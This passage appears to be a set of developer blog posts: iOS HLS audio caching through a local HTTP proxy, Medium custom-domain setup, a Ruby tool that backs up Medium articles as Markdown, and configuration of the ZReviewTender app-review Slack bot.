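    if let cachedData = HLSSegmentCache.shared.data(for: remoteURL) {
        return GCDWebServerDataResponse(data: cachedData, contentType: "application/octet-stream")
    }

    // Synchronous fetch keeps the sketch short; production code should use the async handler variants.
    if let data = try? Data(contentsOf: remoteURL) {
        HLSSegmentCache.shared.store(data, for: remoteURL)
        return GCDWebServerDataResponse(data: data, contentType: "application/octet-stream")
    }
    return GCDWebServerResponse(statusCode: 502)
}

webServer.start(withPort: 8080, bonjourName: nil)
```

Since relative segment paths in the playlist resolve against the http://127.0.0.1:8080 base URL, the `.ts` requests naturally land in the same handler.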
For a complete implementation example, refer to:
Since I referred to that example, I also used GCDWebServer for the local HTTP server part; there is also the newer Telegraph available. (CocoaHttpServer hasn't been updated in a long time and is no longer recommended.)
Looks good! But there’s a problem:
Our service is music streaming rather than a video playback platform. In many cases, users switch music in the background; will the Local HTTP Server still be there then?
GCDWebServer's documentation states that it automatically suspends when the app enters the background and resumes when it returns to the foreground; you can disable this behavior with the option `GCDWebServerOption_AutomaticallySuspendInBackground: false`.
But in practice, if no requests are sent for a period of time, the server will still disconnect (and the status will be incorrect, still showing as isRunning), which feels like it was killed by the system. After delving into the HTTP Server approach, I found that the underlying layer is based on sockets. According to the official documentation on socket services, this issue cannot be resolved. The system will suspend it when there are no new connections in the background.
*There are some convoluted methods found online… like sending a long request or continuously sending empty requests to ensure the server is not suspended by the system in the background.
All of the above applies to the app being in the background. When in the foreground, the server is very stable and won’t be suspended due to idleness, so there’s no such issue!
Since this relies on an extra service, even if there are no issues in the development environment, it's recommended to implement a fallback mechanism in production (e.g., observing the .AVPlayerItemFailedToPlayToEndTime notification and reading AVPlayerItemFailedToPlayToEndTimeErrorKey from its userInfo); otherwise, if the local server dies, playback just hangs for the user.
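A minimal sketch of such a fallback, assuming a hypothetical fallBackToRemotePlayback closure that switches the player back to the original remote URL:

```swift
import AVFoundation

final class PlaybackFallbackObserver {
    private var observer: NSObjectProtocol?

    func startObserving(playerItem: AVPlayerItem, fallBackToRemotePlayback: @escaping () -> Void) {
        observer = NotificationCenter.default.addObserver(
            forName: .AVPlayerItemFailedToPlayToEndTime,
            object: playerItem,
            queue: .main
        ) { notification in
            // The underlying error (e.g. the local proxy server died) is carried in the userInfo.
            let error = notification.userInfo?[AVPlayerItemFailedToPlayToEndTimeErrorKey] as? Error
            print("Playback failed: \(String(describing: error)); falling back to the remote URL")
            fallBackToRemotePlayback()
        }
    }

    deinit {
        if let observer = observer { NotificationCenter.default.removeObserver(observer) }
    }
}
```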
So it's not perfect...
Our `.m3u8`/`.ts` responses all carry `Cache-Control`, `Age`, `ETag`… the usual HTTP client-cache headers. Our website's cache mechanism works perfectly in Chrome, and the new official Protocol Extension for Low-Latency HLS preliminary spec also mentions that cache-control headers can be set for caching.
But in practice, AVFoundation AVPlayer does not have any HTTP Client Caching effect, so this route is also a dead end! Pure wishful thinking.
Implement audio file parsing, caching, encoding, and playback functionality yourself.
This is too hardcore, requiring very deep technical skills and a lot of time; not researched.
Here is an open-source player for reference: FreeStreamer. If you really choose this solution, it’s better to stand on the shoulders of giants and directly use third-party libraries.
Same as Solution 5, too hardcore, requiring very deep technical skills and a lot of time; not researched.
Not researched, but indeed feasible. However, it sounds complicated: you would have to process the downloaded `.ts` files, convert them individually to .mp3 or .mp4, and then either play them in order or stitch them into a single file. It just doesn't sound easy to do. Interested readers can refer to this article.
This method cannot really be called "caching while playing." It actually downloads the entire audio file before playback starts, and if the source is `.m3u8`, then as mentioned in Solution 2.2 it cannot simply be downloaded and played from a local file.
To implement this, you use the iOS ≥ 10 `makeAssetDownloadTask` API (on AVAssetDownloadURLSession, which produces an AVAssetDownloadTask), which packages the `.m3u8` into a `.movpkg` stored locally for playback.
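A minimal sketch of kicking off that kind of download (the session identifier and asset title are placeholders; a real implementation would keep the delegate around and persist the returned .movpkg location):

```swift
import AVFoundation

final class HLSDownloader: NSObject, AVAssetDownloadDelegate {
    private var downloadSession: AVAssetDownloadURLSession!

    func startDownload(from url: URL) {
        // Background configuration so the download can continue while the app is suspended.
        let configuration = URLSessionConfiguration.background(withIdentifier: "hls.download.session")
        downloadSession = AVAssetDownloadURLSession(configuration: configuration,
                                                    assetDownloadDelegate: self,
                                                    delegateQueue: .main)
        let asset = AVURLAsset(url: url)
        let task = downloadSession.makeAssetDownloadTask(asset: asset,
                                                         assetTitle: "aviciiwakemeup",
                                                         assetArtworkData: nil,
                                                         options: nil)
        task?.resume()
    }

    // The system reports the location of the packaged .movpkg here; persist it for offline playback.
    func urlSession(_ session: URLSession,
                    assetDownloadTask: AVAssetDownloadTask,
                    didFinishDownloadingTo location: URL) {
        print("Downloaded .movpkg to \(location)")
    }
}
```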
This is more like offline playback rather than caching.
Additionally, users can view and manage the downloaded packaged audio files from “Settings” -> “General” -> “iPhone Storage” -> APP.
Below is the downloaded video section
For detailed implementation, refer to this example:
The exploration journey above took almost a whole week, going around in circles, almost driving me crazy. Currently, there is no reliable and easy-to-deploy method.
If there are new ideas, I will update!
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Take care of your Domain Authority yourself!
A series of ups and downs: this feature launched in 2012, then closed; it reopened in 2021, was announced closed again in 2022; and recently, in 2024, it's back once more, with the official setup guide updated. You can refer to the latest official documentation for setup, and to this article for the domain registration process.
Take advantage of the open period to set it up quickly, as we never know when the official will decide to close it again; existing custom domains are not affected.
I set up https://blog.zhgchg.li in 2021 when the official closed the custom domain feature, but it still works and is usable to this day.
Medium’s official blog announced on 2021/02/17 that Medium is once again allowing creators to bind their own domain names! Whether it’s a creator’s Profile page or Publications, both support customization.
To ensure that readers from all backgrounds understand, here’s a simple explanation of what a custom domain is.
A domain is like an address in the online world; if I enter the address Medium.com, I will go to Medium; now, creators can customize their domain, which is like customizing their address. You can register the address you want and then link it to your Medium account to replace the original address; for example, I use blog.zhgchg.li as my address, and it will lead to my Medium page.
Research shows that this feature was available in the early days around 2012, with a one-time $75 setup fee. However, when I started writing on Medium in 2018, this feature had already been discontinued. Existing users were not affected, so sometimes when browsing Medium, you may see a domain that belongs to you but the website is hosted on Medium, which is pretty cool. It was rumored that this feature was launched for a while and then taken down, possibly due to commercial considerations as having a custom domain could reduce Medium’s visibility.
I noticed that when sharing links to articles, if the article is part of a Publication but the Publication does not have a custom domain set, or if the Profile’s domain is not used, the link will revert to the default medium.com link.
Here is an example of my setup for reference:
Profile custom domain: blog.zhgchg.li (a subdomain, because the main domain serves another purpose).
I initially set up a Publication page as well, but later removed it. Since I have few followers and limited ability to generate traffic on my own, I rely heavily on search-engine traffic from Google and others. If the Publication also used a custom domain, the article links would sit under my own domain, which isn't well established yet, resulting in poor search rankings and low traffic.
Setting up only the Profile without a Publication has its advantages. The original medium links can still be indexed by Google, and having a link with your own domain allows for a balanced approach. You retain your existing traffic while gradually building the Domain Authority of your domain.
Building authority for a domain takes a long time. I believe this feature is most suitable for those who already have a website service (e.g., musicplayer.com). If you want to build a community, you can directly use Medium, and in this case, a domain like blog.musicplayer.com can be used.
The two scenarios where this feature is suitable are: 1) using the Medium platform to write articles (with increasing customization options) and 2) having a domain with enough Domain Authority that won’t significantly affect SEO.
You can obtain a domain from Namecheap (used as an example in this article) or Godaddy based on your preference. The common price range for a .com domain is approximately $200 to $500 TWD per year. The price varies depending on the domain suffix, length, and rarity, with some rare domains costing millions or even billions.
Domain registration operates on a first-come, first-served basis. Unless a domain name is protected by a trademark in a specific region, it is usually a race to register it. If someone else registers it first, you may need to negotiate a purchase. This has led to a practice known as domain squatting, where individuals register numerous domains and hold them without use, waiting to sell them to others.
Domains require annual payments or can be purchased for multiple years, but there is no option for a lifetime purchase. If you fail to renew the domain, it will be released after the protection period, allowing anyone to register it again.
However, Medium users are unlikely to run into domain squatting, since most are individuals. I registered my online handle zhgchg.li, which had not been taken. If you do run into a duplicate, consider changing the suffix to something like .dev/.net, etc.
For the suffix part, you can refer to the List of Internet Top-Level Domains, but having a suffix listed does not guarantee availability for registration. It depends on the regulations of the domain’s country and whether platforms like Namecheap or Godaddy sell domains with that suffix.
For example, .li is the domain for Liechtenstein, and currently, there are no restrictions on who can register a domain. Only Namecheap still offers this domain for sale.
Benefits of being named Li?
By the way, my spelling zhgchg.li is also called Domain Hack; a better example is google => goo.gl.
The one-time $75 setup fee has been canceled, and it has been changed to be available for all Medium paid members (monthly $5 / yearly $50); but I actually prefer the original one-time setup fee QQ; because I am mostly a creator and do not need the subscription privileges of paid members, the monthly and yearly fee system is more burdensome for me, and I am starting to consider joining the paywall project Orz.
What happens if you join the membership plan first and then do not continue to renew after setting up a custom domain?
After testing, the custom domain remains valid even after the membership expires!
First, go to the Namecheap official website to search for a domain name you like:
Get search results:
If the button on the right says “Add To Cart,” it means the domain name is available for registration and can be added to the cart for purchase.
If the button on the right says “Make offer” or “Taken,” it means the domain name has already been registered, so please choose a different suffix or a different domain name:
After adding to the cart, click on “Checkout” at the bottom.
Proceed to the order confirmation page:
You can enable AUTO-RENEW for automatic renewal each year, or choose to purchase several years at once.
Here is an example of the whois information for google.com, which can be checked here.
Enter credit card information and click on “Confirm Order.”
You have successfully made the purchase!
You will receive an order summary email.
After logging into your account, click on Account in the upper left corner -> “ Dashboard”
Enter the “Dashboard” and switch to the “Domain List” tab, find the Domain you just purchased, and click on “Manage”.
Once inside, switch to the last tab “Advanced DNS”.
Keep this page open and go back to Medium.
Go to the Medium settings page, locate the “Profile” section, and click on “Get started” in the “Custom domain” part.
For Publications, go to Publications’ “Homepage and settings,” and at the bottom, find the “Custom domain” section.
If it shows “Upgrade,” it means you need to upgrade to a paid user to use this feature.
Access the settings page:
Enter your domain name, e.g., www.example.com.
Remember this information and go back to the Namecheap settings page.
In the “Advanced DNS” tab, locate the “HOST RECORDS” section.
Click the “ADD NEW RECORD” button twice to add two new data fields.
Enter the information from Medium:
Click the checkmark on the right to complete the addition.
Check again if there are records in the “HOST RECORDS” section.
If there are records, the Namecheap setup is complete. Go back to the Medium settings page.
Click “Continue” to proceed.
If you see the processing page, it means the setup is complete!
Note that it may take up to 48 hours for the Domain binding DNS settings to take full effect. Accessing the domain may show a 404 error if not yet effective.
Sharing links with a custom domain that is later changed may cause previously shared links to become invalid.
As of 2021/02/24, there are still some issues to be resolved by Medium:
But I believe it’s already functioning correctly 99%!
What happens if you cancel the paid membership… will it expire directly?
Feel free to contact me for any questions or feedback.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Writing a small tool to back up Medium articles & convert them to Markdown format
I've written a project that lets you easily download Medium posts and convert them to Markdown format.
MarkupStyleRender.rb
A backup tool that can crawl the content of a Medium article link, or all articles of a Medium user, convert them into Markdown format, and download them together with the images in the articles.
This project and this article are for technical research only. Please do not use it for any commercial purposes or illegal purposes. The author is not responsible for any illegal activities conducted using this tool. This is a disclaimer.
Please ensure you have the rights to use and download the articles before backing them up.
In the third year of managing Medium, I have published over 65 articles; all articles were written directly on the Medium platform without any other backups. Honestly, I have always been afraid that issues with the Medium platform or other factors might cause the disappearance of my hard work over the years.
I had manually backed up before, which was very boring and time-consuming, so I have been looking for a tool that can automatically download and back up all articles, preferably converting them into Markdown format.
Although the official provides an export backup function, the export format can only be used for importing into Medium, not Markdown or common formats, and it does not handle embedded content like Github Gist.
The API provided by Medium is not well-maintained and only offers the Create Post function.
Reasonable, because Medium does not want users to easily transfer content to other platforms.
I found and tried several Chrome Extensions (most of which have been taken down), but the results were not good. First, you have to manually click into each article to back it up, and second, the parsed format had many errors and could not deeply parse Gist source code or back up all images in the articles.
Some expert wrote it in JS, which can achieve basic download and conversion to Markdown functionality, but still lacks image backup and deep parsing of Gist Source Code.
After struggling to find a perfect solution, I decided to write a backup conversion tool myself; it took about three weeks of after-work time to complete using Ruby.
How to get the article list from a username?
Obtain the UserID: view the source of the user's homepage (https://medium.com/@#{username}) to find the UserID corresponding to the Username. Note that because Medium has reopened custom domains, you need to handle 30X redirects.
Sniffing the network requests reveals that Medium uses GraphQL to fetch the homepage article list:
```
HOST: https://medium.com/_/graphql
METHOD: POST
```
You can only get 10 items at a time, so you need to paginate (see the sketch below):
- Article list: result[0]->userResult->homepagePostsConnection->posts
- Pagination cursor (homepagePostsFrom): obtained from result[0]->userResult->homepagePostsConnection->pagingInfo->next
- Include homepagePostsFrom in the next request to paginate; nil means there are no more pages
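As a rough Swift sketch of the pagination loop (the GraphQL query body and variable names are placeholders that have to be captured from the browser's network inspector; only the endpoint, the 10-per-page behaviour, and the response paths above come from the description):

```swift
import Foundation

// Rough sketch: page through a user's homepage posts, 10 at a time.
// "next" from pagingInfo is treated as an opaque cursor and sent back as homepagePostsFrom.
func fetchAllHomepagePosts(userID: String) async throws -> [[String: Any]] {
    let endpoint = URL(string: "https://medium.com/_/graphql")!
    var allPosts: [[String: Any]] = []
    var homepagePostsFrom: Any? = nil // nil on the first request

    while true {
        var request = URLRequest(url: endpoint)
        request.httpMethod = "POST"
        request.setValue("application/json", forHTTPHeaderField: "Content-Type")

        // Placeholder query/variable names; copy the real ones from the browser's network inspector.
        var variables: [String: Any] = ["userId": userID]
        variables["homepagePostsFrom"] = homepagePostsFrom
        let body: [String: Any] = [
            "query": "<homepage posts query captured from the network inspector>",
            "variables": variables
        ]
        request.httpBody = try JSONSerialization.data(withJSONObject: body)

        let (data, _) = try await URLSession.shared.data(for: request)
        guard
            let result = try JSONSerialization.jsonObject(with: data) as? [[String: Any]],
            let userResult = result.first?["userResult"] as? [String: Any],
            let connection = userResult["homepagePostsConnection"] as? [String: Any]
        else { break }

        allPosts += connection["posts"] as? [[String: Any]] ?? []

        // pagingInfo.next is nil (absent) when there are no more pages.
        let pagingInfo = connection["pagingInfo"] as? [String: Any]
        guard let next = pagingInfo?["next"], !(next is NSNull) else { break }
        homepagePostsFrom = next
    }
    return allPosts
}
```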
How to parse article content?
Viewing the article's source code reveals that Medium is built on the Apollo Client; its HTML is actually rendered by JS, so you can find the window.__APOLLO_STATE__ field in the page source, which holds the data used to render the article.
We need to do the same: parse this JSON, map each type to the corresponding Markdown style, and assemble the Markdown output.
A technical difficulty here is rendering paragraph text styles, where Medium provides the structure as follows:
```json
"Paragraph": {
  "text": "code in text, and link in text, and ZhgChgLi, and bold, and I, only i",
  "markups": [
    {
      "type": "CODE",
      "start": 5,
      "end": 7
    },
    {
      "start": 18,
      "end": 22,
      "href": "http://zhgchg.li",
      "type": "LINK"
    },
    {
      "type": "STRONG",
      "start": 50,
      "end": 63
    },
    {
      "type": "EM",
      "start": 55,
      "end": 69
    }
  ]
}
```
This means that for the text `code in text, and link in text, and ZhgChgLi, and bold, and I, only i`:
- Characters 5 to 7 should be marked as code (wrapped in `Text` format)
- Characters 18 to 22 should be marked as a link (wrapped in [Text](URL) format)
- Characters 50 to 63 should be marked as bold (wrapped in **Text** format)
- Characters 55 to 69 should be marked as italic (wrapped in _Text_ format)
Characters 5 to 7 & 18 to 22 are easy to handle in this example because they do not overlap; but 50–63 & 55–69 will have overlapping issues, and Markdown cannot represent overlapping in the following way:
```
code `in` text, and [ink](http://zhgchg.li) in text, and ZhgChgLi, and **bold,_ and I, **only i_
```
The correct combination result is as follows:
```
code `in` text, and [ink](http://zhgchg.li) in text, and ZhgChgLi, and **bold,_ and I, _**_only i_
```
- 50–55: STRONG
- 55–63: STRONG, EM
- 63–69: EM
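In other words, the overlapping ranges have to be split at every markup boundary into non-overlapping segments, each carrying all the styles that cover it. A rough Swift sketch of that splitting step (type names are illustrative; plain unstyled text and emitting the actual Markdown symbols per segment are left out):

```swift
// Illustrative markup range, mirroring Medium's {type, start, end} structure.
struct Markup {
    let type: String // e.g. "STRONG", "EM", "LINK", "CODE"
    let start: Int   // inclusive
    let end: Int     // exclusive
}

// A non-overlapping slice of text together with every style that applies to it.
struct StyledSegment {
    let range: Range<Int>
    let types: [String]
}

// Split overlapping markups (e.g. STRONG 50–63 and EM 55–69) into
// boundary-aligned segments: 50–55 STRONG, 55–63 STRONG+EM, 63–69 EM.
func splitIntoSegments(markups: [Markup]) -> [StyledSegment] {
    let boundaries = Set(markups.flatMap { [$0.start, $0.end] }).sorted()
    var segments: [StyledSegment] = []
    for (lower, upper) in zip(boundaries, boundaries.dropFirst()) {
        let covering = markups.filter { $0.start <= lower && upper <= $0.end }.map { $0.type }
        if !covering.isEmpty {
            segments.append(StyledSegment(range: lower..<upper, types: covering))
        }
    }
    return segments
}

// Example from the paragraph above:
let markups = [Markup(type: "STRONG", start: 50, end: 63), Markup(type: "EM", start: 55, end: 69)]
print(splitIntoSegments(markups: markups).map { "\($0.range) \($0.types)" })
// e.g. 50..<55 ["STRONG"], 55..<63 ["STRONG", "EM"], 63..<69 ["EM"]
```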
Additionally, please note: symbols such as `**` go at both the beginning and the end of a segment; if it is a link, the beginning will be `[` and the end will be `](URL)`.
This was studied for a long time; for now, an existing package, reverse_markdown, is used to solve it.
Special thanks to former colleagues Nick, Chun-Hsiu Liu, and James for their collaborative research. I will rewrite it natively when I have time.
Original text -> Converted Markdown result
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Real-time monitoring of the latest app reviews and providing instant feedback to improve collaboration efficiency and consumer satisfaction
App Reviews to Slack Channel
ZReviewTender — Automatically monitors the latest user reviews of App Store iOS/macOS apps and Google Play Android apps, and provides continuous integration tools to integrate into team workflows, improving collaboration efficiency and consumer satisfaction.
Problem:
Marketplace reviews are very important for a product, but relaying and referencing them is a very manual, repetitive task: you have to check for new reviews from time to time, and forward any customer-service issues to customer service for follow-up.
Through the ZReviewTender review bot, reviews are automatically forwarded to the Slack Channel, allowing everyone to quickly receive the latest review information, and track and discuss in real-time. It also allows the entire team to understand the current user reviews and suggestions for the product.
For more information, refer to: 2021 Pinkoi Tech Career Talk — High-Efficiency Engineering Team Demystified.
If you only need the default features of ZReviewTender (to Slack/Google Translate/Filter), you can use the following quick deployment method.
ZReviewTender has been packaged and released on RubyGems, and you can quickly and easily install and use ZReviewTender with RubyGems.
Click the “Use this template” button at the top right.
⚠️⚠️ Be sure to create a Private Repo ⚠️⚠️
Because you will upload settings and private keys to the project
Finally, click the “Create repository from template” button at the bottom.
Confirm that the Repo name at the top right shows “🔒” and the Private label.
If not, it means you created a Public Repo which is very dangerous, please go to the top Tab “Settings” -> “General” -> Bottom “Danger Zone” -> “Change repository visibility” -> “Make private” to change it back to Private Repo.
You can check the Badge in the Readme on the Repo homepage
If it shows passing, it means init was successful.
Or click the top Tab “Actions” -> wait for the “Init ZReviewTender” Workflow to complete:
The execution status will change to "✅ Init ZReviewTender" -> the project init succeeded.
Click the “Code” tab above to return to the project directory. If the project init is successful, you will see:
```
config/
config/android.yml
config/apple.yml
latestCheckTimestamp/
latestCheckTimestamp/.keep
```
Enter the `config/` directory to complete the configuration of the `android.yml` & `apple.yml` files.
Click the config YML file you want to edit and click the "✏️" in the upper right corner to edit the file.
Refer to the "Settings" section below to complete the configuration of `android.yml` & `apple.yml`.
After editing, you can directly save the settings by clicking “Commit changes” below.
Upload the corresponding Key files to the `config/` directory:
In the `config/` directory, select "Add file" -> "Upload files" in the upper right corner.
Upload the corresponding Key and external files referenced in the config yml to the `config/` directory: drag the files to the upper block -> wait for the files to upload -> click "Commit changes" below to save.
After uploading, go back to the `config/` directory to check that the files were correctly saved & uploaded.
Click the “Actions” tab above -> select “ZReviewTender” on the left -> select “Run workflow” on the right -> click the “Run workflow” button to execute ZReviewTender once.
After clicking, refresh the webpage and you will see:
Click “ZReviewTender” to view the execution status.
Expand the "Run ZReviewTender -r" block to view the execution log.
Here you can see an error because I haven't configured my config yml files properly.
Go back and adjust the android/apple config yml, then return to step 6 and trigger the execution again.
Check the log of the "Run ZReviewTender -r" block to confirm successful execution!
The Slack channel designated to receive the latest review messages will also show an init success message 🎉
Configuration complete! From now on, the latest reviews within the period will be automatically fetched and forwarded to your Slack channel every 6 hours!
You can check the latest execution status at the top of the Readme on the Repo homepage:
If an error occurs, it means there was an execution error. Please go to Actions -> ZReviewTender to view the records; if there is an unexpected error, please create an Issue with the record information, and it will be fixed as soon as possible!
❌❌❌ When an error occurs, Github will also send an email notification, so you don’t have to worry about the bot crashing without anyone noticing!
You can configure the Github Action execution rules according to your needs.
Click on the "Actions" tab above -> "ZReviewTender" on the left -> "ZReviewTender.yml" on the top right.
Click the “✏️” on the top right to edit the file.
There are two parameters that can be adjusted:
cron: Sets how often to check for new reviews. The default is `15 */6 * * *`, which runs at minute 15 past every 6th hour (i.e. roughly every 6 hours).
You can refer to crontab.guru to configure it according to your needs.
Please note:
- Github Action uses the UTC time zone
- The higher the execution frequency, the more Github Action execution quota will be consumed
run: Sets the command to execute; refer to the "Execution" section below. The default is `ZReviewTender -r`. Available commands include:
- `ZReviewTender -r`
- `ZReviewTender -g`
- `ZReviewTender -a`
After editing, click “Start commit” on the top right and select “Commit changes” to save the settings.
Refer to the previous section “6. Initialize ZReviewTender (Manually trigger execution once)”
If you are familiar with Gems, you can directly use the following command to install ZReviewTender
```bash
gem install ZReviewTender
```
If you are not familiar with Ruby or Gems, you can follow the steps below to install ZReviewTender step by step:
1. Install Ruby (≥ 2.6.5) and run `which ruby` to confirm that the Ruby currently in use is not the system Ruby (`/usr/bin/ruby`).
2. Install ZReviewTender:

```bash
gem install ZReviewTender
```

3. For a manual deployment project, run `bundle install` to install ZReviewTender's related dependencies.

The method for creating a custom Processor can be found later in the article.
ZReviewTender — Use a yaml file to configure the Apple/Google review bot.
[Recommendation] Directly use the command at the bottom of the article — “Generate Configuration File”:
```bash
ZReviewTender -i
```
This directly generates blank `apple.yml` & `android.yml` configuration files.
Refer to the apple.example.yml file:
⚠️ After downloading `apple.example.yml`, remember to rename the file to `apple.yml`.
apple.yml:
```yaml
platform: 'apple'
appStoreConnectP8PrivateKeyFilePath: '' # APPLE STORE CONNECT API PRIVATE .p8 KEY File Path
appStoreConnectP8PrivateKeyID: '' # APPLE STORE CONNECT API PRIVATE KEY ID
appStoreConnectIssueID: '' # APPLE STORE CONNECT ISSUE ID
appID: '' # APP ID
...
```
- appStoreConnectIssueID: the Issuer ID of your App Store Connect API key.
- appStoreConnectP8PrivateKeyID & appStoreConnectP8PrivateKeyFilePath: create an App Store Connect API Key for ZReviewTender with the App Manager role, note its Key ID, download the API Key (`/AuthKey_XXXXXXXXXX.p8`), and place the file in the same directory as the config yml.
- appID: App Store Connect -> App Store -> General -> App Information -> Apple ID.
The Google API services used by ZReviewTender (fetching store reviews, Google Translate, Google Sheet) all use Service Account authentication.
You can follow the official steps to create a GCP project & Service Account, then download and save the GCP Service Account credentials (`*.json`).
If you use Google Translate, make sure the `Cloud Translation API` is enabled and the Service Account is added; if you use Google Sheets, make sure the `Google Sheets API` and `Google Drive API` are enabled and the Service Account is added.
Refer to the android.example.yml file:
⚠️ After downloading `android.example.yml`, remember to rename the file to `android.yml`.
android.yml:
```yaml
platform: 'android'
packageName: '' # Android App Package Name
keyFilePath: '' # Google Android Publisher API Credential .json File Path
playConsoleDeveloperAccountID: '' # Google Console Developer Account ID
playConsoleAppID: '' # Google Console App ID
...
```
- packageName: e.g. `com.XXXXX`, can be obtained from Google Play Console -> Dashboard -> App.
- playConsoleDeveloperAccountID & playConsoleAppID: can be obtained from the URL of the Google Play Console -> Dashboard -> App page; they are used to generate a review message link so the team can quickly open the backend review reply page by clicking the link.
- keyFilePath: the most important item, the GCP Service Account credential key (`*.json`).
Follow the steps in the official documentation to create a Google Cloud Project & Service Account, then go to Google Play Console -> Setup -> API Access to enable the Google Play Android Developer API
and link the project. Download the JSON key from GCP.
Example content of the JSON key:
gcp_key.json:
```json
{
  "type": "service_account",
  "project_id": "XXXX",
  "private_key_id": "XXXX",
  "private_key": "-----BEGIN PRIVATE KEY-----\nXXXX\n-----END PRIVATE KEY-----\n",
  "client_email": "XXXX@XXXX.iam.gserviceaccount.com",
  "client_id": "XXXX",
  "auth_uri": "https://accounts.google.com/o/oauth2/auth",
  "token_uri": "https://oauth2.googleapis.com/token",
  "auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
  "client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/XXXX.iam.gserviceaccount.com"
}
```
Set the key file path to e.g. `/gcp_key.json` and place the file in the same directory as the config yml.

```yaml
processors:
  - FilterProcessor:
    class: "FilterProcessor"
    enable: true # enable
    keywordsInclude: [] # keywords you want to filter out
    ratingsInclude: [] # ratings you want to filter out
    territoriesInclude: [] # territories you want to filter out
  - GoogleTranslateProcessor: # Google Translate Processor, will translate review text to your language, you can remove the whole block if you don't need it.
    class: "GoogleTranslateProcessor"
    enable: false # enable
    googleTranslateAPIKeyFilePath: '' # Google Translate API Credential .json File Path
    googleTranslateTargetLang: 'zh-TW' # Translate to what Language
    googleTranslateTerritoriesExclude: ["TWN","CHN"] # Review origin Territory (language) that you don't want to translate.
  - SlackProcessor: # Slack Processor, resend App Review to Slack.
    class: "SlackProcessor"
    enable: true # enable
    slackTimeZoneOffset: "+08:00" # Review Created Date TimeZone
    slackAttachmentGroupByNumber: "1" # 1~100, how many review messages in 1 slack message.
    slackBotToken: "" # Slack Bot Token, send slack message through Slack Bot.
    slackBotTargetChannel: "" # Slack Bot target Channel ID, send slack message through Slack Bot. (recommended, first priority)
    slackInCommingWebHookURL: "" # Slack In-Comming WebHook URL, send slack message through Incoming WebHook, not recommended, deprecated.
  ...More Processors...
```
ZReviewTender comes with four processors, and the order affects the data processing flow: FilterProcessor -> GoogleTranslateProcessor -> SlackProcessor -> GoogleSheetProcessor.
FilterProcessor:
Filters the fetched reviews based on specified conditions, only processing reviews that meet the criteria.
- class: no need to adjust, points to `lib/Processors/FilterProcessor.rb`
- enable: `true`/`false`, whether to enable this Processor
- keywordsInclude: ["keyword1", "keyword2", ...] filter reviews that contain these keywords
- ratingsInclude: [1, 2, ...] (1~5) filter reviews that include these ratings
- territoriesInclude: ["zh-hant", "TWN", ...] filter reviews that include these regions (Apple) or languages (Android)

GoogleTranslateProcessor:
Translates the reviews into the specified language.
- class: no adjustment needed, points to `lib/Processors/GoogleTranslateProcessor.rb`
- enable: `true`/`false`, whether to enable this Processor
- googleTranslateAPIKeyFilePath: e.g. `/gcp_key.json`, the GCP Service Account credential key (`*.json`); place the file in the same directory as the config yml, refer to the JSON key example above. (Please ensure that the service account of the JSON key has `Cloud Translation API` permissions)
- googleTranslateTargetLang: e.g. `zh-TW`, `en`, ... the target translation language
- googleTranslateTerritoriesExclude: ["zh-hant", "TWN", ...] territories (Apple) or languages (Android) that do not need translation

SlackProcessor:
Forwards reviews to Slack.
- class: no adjustment needed, points to `lib/Processors/SlackProcessor.rb`
- enable: `true`/`false`, whether to enable this Processor
- slackTimeZoneOffset: e.g. `+08:00`, the time zone used when displaying the review time
- slackAttachmentGroupByNumber: 1~100, how many reviews to combine into one Slack message to speed up sending; the default is 1 review per Slack message
- slackBotToken: e.g. `xoxb-xxxx-xxxx-xxxx`; Slack recommends creating a Slack Bot with the `postMessages` scope and using it to send Slack messages
- slackBotTargetChannel: e.g. `CXXXXXX`, the channel (group) ID (not the group name) the Slack Bot will send to; you also need to add your Slack Bot to that channel
- slackInCommingWebHookURL: e.g. `https://hooks.slack.com/services/XXXXX`, uses the legacy Incoming WebHook URL to send messages to Slack. Note: Slack does not recommend continuing to use this method.

Please note, this is a legacy custom integration — an outdated way for teams to integrate with Slack. These integrations lack newer features and they will be deprecated and possibly removed in the future. We do not recommend their use. Instead, we suggest that you check out their replacement: Slack apps.
GoogleSheetProcessor:
Records reviews to a Google Sheet.
- class: no adjustment needed, points to `lib/Processors/GoogleSheetProcessor.rb`
- enable: `true`/`false`, whether to enable this Processor
- GCP key file path: e.g. `/gcp_key.json`, the GCP Service Account credential key (`*.json`); place the file in the same directory as the config yml, refer to the JSON key example above. (Please ensure that the service account of the JSON key has `Google Sheets API` and `Google Drive API` permissions)
- time zone offset: e.g. `+08:00`, the time zone used when displaying the review time
- Google Sheet ID: can be obtained from the Google Sheet URL: https://docs.google.com/spreadsheets/d/googleSheetID/
- sheet name: e.g. `Sheet1`
- keywords: ["keyword1", "keyword2", ...] filter reviews that contain these keywords
- ratings: [1, 2, ...] (1~5) filter reviews that contain these rating scores
- territories: ["zh-hant", "TWN", ...] filter reviews that contain these territories (Apple) or languages (Android)

The following template variables can be used in the `values` setting:

```
%TITLE% Review Title
%BODY% Review Content
%RATING% Review Rating 1~5
%PLATFORM% Review Source Platform Apple or Android
%ID% Review ID
%USERNAME% Review Username
%URL% Review URL
%TERRITORY% Review Territory (Apple) or Review Language (Android)
%APPVERSION% Reviewed App Version
%CREATEDDATE% Review Creation Date
```
For example, my Google Sheet columns are as follows:
```
Review Rating,Review Title,Review Content,Review Information
```
Then values can be set as:
```yaml
values: ["%TITLE%","%BODY%","%RATING%","%PLATFORM% - %APPVERSION%"]
```
If you need a custom Processor, please use manual deployment, as the gem version of ZReviewTender is packaged and cannot be dynamically adjusted.
You can refer to lib/Processors/ProcessorTemplate.rb to create your extension:
```ruby
$lib = File.expand_path('../lib', File.dirname(__FILE__))

require "Models/Review"
require "Models/Processor"
require "Helper"
require "ZLogger"

# Add to config.yml:
#
# processors:
#   - ProcessorTemplate:
#     class: "ProcessorTemplate"
#     parameter1: "value"
#     parameter2: "value"
#     parameter3: "value"
# ...
#

class ProcessorTemplate < Processor

  def initialize(config, configFilePath, baseExecutePath)
    # init Processor
    # get parameter from config e.g. config["parameter1"]
    # configFilePath: file path of config file (apple.yml/android.yml)
    # baseExecutePath: user execute path
  end

  def processReviews(reviews, platform)
    if reviews.length < 1
      return reviews
    end

    ## do what you want to do with reviews...

    ## return result reviews
    return reviews
  end
end
```
initialize will provide: the processor config, the config file path (apple.yml/android.yml), and the base execute path.
